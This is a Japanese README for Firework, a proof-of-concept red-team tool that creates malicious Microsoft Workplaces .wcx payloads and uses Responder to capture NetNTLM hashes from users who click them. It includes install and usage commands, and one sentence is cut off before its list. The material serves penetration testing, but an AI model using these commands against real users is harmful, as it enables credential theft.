
Fireworkは、プロビジョニングプロセスに必要な有効なファイルを作成してMicrosoft Workplacesと連携するための概念実証ツールです。
⚠️ 注記:このツールは現在アクティブなメンテナンスを行っていません。
Fireworkは、Microsoft Workplacesと対話し、プロビジョニングプロセスに必要な有効なファイルを作成するための概念実証ツールです。また、Responderのコードの一部をラップして、WorkplaceフィードをプロビジョニングするシステムからNetNTLMハッシュをキャプチャする機能を活用しています。
このツールは、ペネトレーションテストやレッドチーム演習の一環として、.wcxペイロード(および関連フィード)を作成するために使用できます。ユーザーがクリックした場合、次の目的で使用される可能性があります:
詳細な要約とウォークスルーについては、SpiderLabsブログをお読みください。
$ pip install -r requirements.txt
.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: .
;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,.
[[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ \[[,[[[,/[[[' [[[[[/'
`$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$,
888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o,
"MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP"
使用方法: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
[-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
[-t CERT] [-k KEY]
WCXワークプレイスツール
オプション引数:
-h, --help このヘルプメッセージを表示して終了
-c COMPANY, --company COMPANY
会社名
-u URL, --url URL フィードURL
-a APP, --app APP アプリ名
-e EXT, --ext EXT アプリ拡張子
-i ICON, --icon ICON アプリアイコン
-l LISTEN, --listen LISTEN
TLS Webサーバーポート
-r RDP, --rdp RDP RDPサーバー
-d DOMAIN, --domain DOMAIN
RDPドメイン
-n USERNAME, --username USERNAME
RDPユーザー名
-p PASSWORD, --password PASSWORD
RDPパスワード
-t CERT, --cert CERT SSL証明書
-k KEY, --key KEY SSLキー
基本的な例:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico
現在のディレクトリに cert.crt と key.pem が存在する場合、組み込みWebサーバーがポート443で起動します。これにより、responderを使用したNTLMチャレンジが強制されます。これらのファイルが存在しない場合、ツールはすべてのファイルをローカルディレクトリに書き込み、独自のホスティングが可能です。
組み込みWebサーバーを別のポートで起動する場合は、以下のように -l フラグを使用します:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
提供される .rdp ファイルにカスタマイズを追加することもできます。
注:.rdpファイルに保存されたパスワードは、デフォルト設定では無視される可能性があります。
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <暗号化パスワード>
ツールを実行すると、現在のディレクトリに 'payload.wcx' が書き込まれます。このファイルをクリックすると、プロビジョニングプロセスが開始されます。
Firework
作成者 David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.
このプログラムはフリーソフトウェアです。あなたは、フリーソフトウェア財団によって公開されたGNU General Public Licenseのバージョン3、または(あなたの選択により)それ以降のバージョンの条件に基づいて、再配布および/または変更することができます。
このプログラムは、有用であることを期待して配布されていますが、いかなる保証もありません。商品性または特定目的への適合性についての暗黙の保証も含め、一切の保証はありません。詳細については、GNU General Public Licenseをご覧ください。